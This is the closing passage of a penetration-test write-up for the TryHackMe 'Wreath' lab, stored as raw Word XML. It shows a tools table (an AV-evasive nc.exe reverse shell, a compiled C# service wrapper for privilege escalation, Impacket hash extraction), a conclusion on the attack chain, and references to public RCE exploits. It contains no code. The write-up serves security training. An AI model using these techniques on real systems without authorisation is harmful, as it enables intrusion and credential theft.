            <w:tcW w:type="dxa" w:w="32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nc.exe (older/recompiled build)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="78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AV-evasive reverse shell on the hardened, Defender-protected host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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mcs (Mono C# compiler)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7800"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Compiling a C# service wrapper binary for the privilege-escalation stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Impacket (smbserver.py, secretsdump.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7800"/>
            <w:shd w:fill="F3F4F6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">File staging over SMB and offline SAM/SYSTEM hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="288"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Wreath engagement is a compact but comprehensive demonstration of an end-to-end internal penetration test: an external unauthenticated RCE providing an initial foothold, internal reconnaissance and multi-hop pivoting through two additional network segments, credential harvesting and reuse, custom web-application exploitation, AV-evasion techniques, and Windows privilege escalation via a classic service misconfiguration. No single vulnerability was individually catastrophic in isolation, but the absence of layered, independent controls at each stage allowed a single initial foothold to cascade into complete compromise of the environment — the central lesson of nearly all real-world internal breaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="380"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe — Wreath room: https://tryhackme.com/room/wreath</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-15107 — Webmin passwd_change.cgi unauthenticated RCE (MuirlandOracle PoC): https://github.com/MuirlandOracle/CVE-2019-15107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit-DB ID 43777 — GitStack 2.3.10 unauthenticated remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evil-WinRM: https://github.com/Hackplayers/evil-winrm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chisel: https://github.com/jpillora/chisel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacket: https://github.com/fortra/impacket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference write-up consulted for methodology cross-check: omni, "TryHackMe — Wreath", Medium, Nov 2025 — https://medium.com/@omni./tryhackme-wreath-7da00105e263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80"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="111827"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="280"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F2937"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:before="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="374151"/>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2026-09-27T18:59:18.064Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-27T18:59:18.065Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>